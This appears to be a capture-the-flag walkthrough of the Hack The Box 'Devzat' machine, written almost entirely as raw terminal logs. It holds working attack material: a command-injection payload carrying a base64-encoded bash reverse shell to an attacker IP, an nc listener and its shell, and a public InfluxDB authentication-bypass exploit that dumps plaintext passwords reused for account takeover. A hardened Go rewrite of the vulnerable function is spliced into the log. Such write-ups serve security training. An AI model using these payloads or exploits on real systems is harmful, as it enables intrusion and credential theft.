$ nmap -p- -T4 -A 10.129.219.228
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 18:24 EDT
Nmap scan report for 10.129.219.228
Host is up (0.030s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=10/16%Time=616B512E%P=x86_64-pc-linux-gnu%r(N
SF:ULL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.46 seconds
ssh -l [patrick] devzat.htb -p 8000
c: /help
[SYSTEM] Welcome to Devzat! Devzat is chat over SSH: github.com/quackduck/devzat
[SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere.
[SYSTEM]
[SYSTEM] Interesting features:
[SYSTEM] • Many, many commands. Run /commands.
[SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room.
[SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines.
[SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an example.
[SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user.
[SYSTEM] • Timezone support, use /tz Continent/City to set your timezone.
[SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games.
[SYSTEM] • Emoji replacements! (like on Slack and Discord)
[SYSTEM]
[SYSTEM] For replacing newlines, I often use bulkseotools.com/add-remove-line-breaks.php.
[SYSTEM]
[SYSTEM] Made by Ishan Goel with feature ideas from friends.
[SYSTEM] Thanks to Caleb Denio for lending his server!
[SYSTEM]
[SYSTEM] For a list of commands run
[SYSTEM] ┃ /commands
2 minutes in
c: /commands
[SYSTEM] Commands
[SYSTEM] clear - Clears your terminal
[SYSTEM] message - Sends a private message to someone
[SYSTEM] users - Gets a list of the active users
[SYSTEM] all - Gets a list of all users who has ever connected
[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
[SYSTEM] bell - Toggles notifications when you get pinged
[SYSTEM] room - Changes which room you are currently in
[SYSTEM] id - Gets the hashed IP of the user
[SYSTEM] commands - Get a list of commands
[SYSTEM] nick - Change your display name
[SYSTEM] color - Change your display name color
[SYSTEM] timezone - Change how you view time
[SYSTEM] emojis - Get a list of emojis you can use
[SYSTEM] help - Get generic info about the server
[SYSTEM] tictactoe - Play tictactoe
[SYSTEM] hangman - Play hangman
[SYSTEM] shrug - Drops a shrug emoji
[SYSTEM] ascii-art - Bob ross with text
[SYSTEM] example-code - Hello world!
$ ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200
pets [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4989/4989] :: Job [1/1] :: 1219 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
$ gobuster -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://devzat.htb -o subdomain_devzat.txt
$ cat subdomain_devzat.txt | grep "Status: 200"
Found: pets.devzat.htb (Status: 200) [Size: 510]
$ dirb http://pets.devzat.htb
---- Scanning URL: http://pets.devzat.htb/ ----
+ http://pets.devzat.htb/.git/HEAD (CODE:200|SIZE:23)
+ http://pets.devzat.htb/build (CODE:301|SIZE:42)
+ http://pets.devzat.htb/css (CODE:301|SIZE:40)
+ http://pets.devzat.htb/server-status (CODE:403|SIZE:280)
$ ffuf -u http://pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -fs 510
css [Status: 301, Size: 40, Words: 3, Lines: 3]
build [Status: 301, Size: 42, Words: 3, Lines: 3]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
.git [Status: 301, Size: 41, Words: 3, Lines: 3]
:: Progress: [43003/43003] :: Job [1/1] :: 1138 req/sec :: Duration: [0:00:41] :: Errors: 0 :
$ gobuster dir -u http://pets.devzat.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Error: the server returns a status code that matches the provided options for non existing urls. http://pets.devzat.htb/dae12bd4-709f-4b81-b9eb-297c8e0d1bfd => 200 (Length: 510). To continue please exclude the status code, the length or use the --wildcard switch
$ /home/kali/0.htb/gitTools-v0.0.1/Dumper/gitdumper.sh http://pets.devzat.htb/.git/ pets
$ /home/kali/.local/bin/githacker --url http://pets.devzat.htb --folder pets-devzat-result
$ cat main.go
package main

import "os/exec"

// loadCharacter concatenates the user-supplied species value into a
// command line run by "sh -c", so shell metacharacters in species
// (backticks, ";", "|") are interpreted by the shell: command injection.
func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	}
	return string(stdoutStderr)
}
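A hardened replacement for the loadCharacter function above, added here as an example and not part of the Devzat pets code: it drops the shell entirely, allowlists the species name, and confines the read to the characteristics directory. The name loadCharacterSafe, the baseDir parameter and the allowlist regexp are assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
)

// Allowlist for the lookup key: lowercase letters only, so shell
// metacharacters, slashes and ".." never reach the filesystem call.
var speciesName = regexp.MustCompile(`^[a-z]{1,32}$`)

var errBadSpecies = errors.New("invalid species name")

// loadCharacterSafe reads <baseDir>/<species> directly with os.ReadFile
// instead of "sh -c cat ...", so no shell parses user input at all.
func loadCharacterSafe(baseDir, species string) (string, error) {
	if !speciesName.MatchString(species) {
		return "", errBadSpecies
	}
	base, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	target := filepath.Join(base, species)
	// Defence in depth: the resolved path must stay inside baseDir.
	if filepath.Dir(target) != base {
		return "", errBadSpecies
	}
	data, err := os.ReadFile(target)
	if err != nil {
		return "", err
	}
	return string(data), nil
}

func main() {
	// "characteristics" is the directory name used by the page's code.
	out, err := loadCharacterSafe("characteristics", "cat")
	if err != nil {
		fmt.Println("rejected or unreadable:", err)
		return
	}
	fmt.Print(out)
}
```

The injection payloads seen later on this page (a name with "; ping ..." or a backtick-wrapped command) fail the allowlist before any file or process is touched.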
$ sudo tcpdump -i tun0 icmp
## burp suite
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
Content-Length: 35
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://pets.devzat.htb
Referer: http://pets.devzat.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"name":"cpt; ping -c 10.10.14.52"}
kali@kali:~/0.htb/release_arena/devzat/$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:02:41.271072 IP devzat.htb > kali: ICMP echo request, id 1, seq 43, length 64
14:02:41.271098 IP kali > devzat.htb: ICMP echo reply, id 1, seq 43, length 64
$ echo 'bash -i >& /dev/tcp/10.10.14.52/4444 0>&1' |base64
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTIvNDQ0NCAwPiYxCg==
kali@kali:~/0.htb/release_arena/devzat10.129.219.228$ nc -lvnp 4444
listening on [any] 4444 ...
{"name":"Test","species":"`echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTIvNDQ0NCAwPiYxCg==|base64 -d|bash`"}
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
Content-Length: 110
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://pets.devzat.htb
Referer: http://pets.devzat.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"name":"Test","species":"`echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTIvNDQ0NCAwPiYxCg==|base64 -d|bash`"}
kali@kali:~/0.htb/release_arena/devzat10.129.219.228$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.52] from (UNKNOWN) [10.129.220.90] 37144
bash: cannot set terminal process group (924): Inappropriate ioctl for device
bash: no job control in this shell
patrick@devzat:~/pets$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
patrick@devzat:/home/catherine$ ll
ll
total 32
drwxr-xr-x 4 catherine catherine 4096 Sep 21 19:35 ./
drwxr-xr-x 4 root root 4096 Jun 22 18:26 ../
lrwxrwxrwx 1 root root 9 Jun 22 20:41 .bash_history -> /dev/null
-rw-r--r-- 1 catherine catherine 220 Jun 22 18:26 .bash_logout
-rw-r--r-- 1 catherine catherine 3808 Jun 22 18:44 .bashrc
drwx------ 2 catherine catherine 4096 Sep 21 19:35 .cache/
-rw-r--r-- 1 catherine catherine 807 Jun 22 18:26 .profile
drwx------ 2 catherine catherine 4096 Sep 29 16:31 .ssh/
-r-------- 1 catherine catherine 33 Oct 16 20:20 user.txt
patrick@devzat:/home/catherine$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
patrick@devzat:/home/catherine$
##transfer linpeas.sh to devzat.htb
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
patrick@devzat:~$ wget http://10.10.14.52:8000/linpeas.sh
## copy patrick's ~/.ssh/id_rsa to the attack box and run: $ chmod 600 id_rsa
kali@kali:~/0.htb/release_arena/devzat$ ssh -i id_rsa patrick@10.129.220.90
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
patrick@devzat:~$
$ bash linpeas.sh -a > /dev/shm/linpeas.txt
$ less -r /dev/shm/linpeas.txt
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN 933/./petshop
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8086 0.0.0.0:* LISTEN -
## port forward
$ chisel server -p 8090 --reverse
2021/10/17 16:42:34 server: Reverse tunnelling enabled
2021/10/17 16:42:34 server: Fingerprint mWKeAKn1u+Y8kxLgCPA6t7IT3rwY6syif6VdRm/uj20=
2021/10/17 16:42:34 server: Listening on http://0.0.0.0:8090
patrick@devzat:~$ ./chisel client 10.10.14.52:8090 R:8086:127.0.0.1:8086
2021/10/17 20:47:05 client: Connecting to ws://10.10.14.52:8090
2021/10/17 20:47:05 client: Connected (Latency 31.719208ms)
kali@kali:~/0.htb/release_arena/devzat$ nmap -p 8086 -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-17 16:48 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).
PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5
GitHub - LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933: InfluxDB CVE-2019-20933 vulnerability exploit
$ git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git
$ cd InfluxDB-Exploit-CVE-2019-20933
$ pip install -r requirements.txt
$ python3 __main__.py
Insert ip host (default localhost):
Insert port (default 8086):
Insert influxdb user (wordlist path to bruteforce username): /usr/share/seclists/Usernames/Names/names.txt
Start username bruteforce
Host vulnerable !!!
Databases list:
1) devzat
2) _internal
Insert database name (exit to close): devzat
[devzat] Insert query (exit to change db): SELECT * FROM "user"
{
"results": [
{
"series": [
{
"columns": [
"time",
"enabled",
"password",
"username"
],
"name": "user",
"values": [
[
"2021-06-22T20:04:16.313965493Z",
false,
"WillyWonka2021",
"wilhelm"
],
[
"2021-06-22T20:04:16.320782034Z",
true,
"woBeeYareedahc7Oogeephies7Aiseci",
"catherine"
],
[
"2021-06-22T20:04:16.996682002Z",
true,
"RoyalQueenBee$",
"charles"
]
]
}
],
"statement_id": 0
}
]
}
[devzat] Insert query (exit to change db):
patrick@devzat:~$ su catherine
Password:
catherine@devzat:/home/patrick$ id
uid=1001(catherine) gid=1001(catherine) groups=1001(catherine)
catherine@devzat:/home/patrick$ cd ..
catherine@devzat:/home$ cd catherine/
catherine@devzat:~$ ll
total 32
drwxr-xr-x 4 catherine catherine 4096 Sep 21 19:35 ./
drwxr-xr-x 4 root root 4096 Jun 22 18:26 ../
lrwxrwxrwx 1 root root 9 Jun 22 20:41 .bash_history -> /dev/null
-rw-r--r-- 1 catherine catherine 220 Jun 22 18:26 .bash_logout
-rw-r--r-- 1 catherine catherine 3808 Jun 22 18:44 .bashrc
drwx------ 2 catherine catherine 4096 Sep 21 19:35 .cache/
-rw-r--r-- 1 catherine catherine 807 Jun 22 18:26 .profile
drwx------ 2 catherine catherine 4096 Sep 29 16:31 .ssh/
-r-------- 1 catherine catherine 33 Oct 16 20:20 user.txt
catherine@devzat:~$ cat user.txt
0407698dbdc34a436676297b5f6b1c9f
catherine@devzat:~$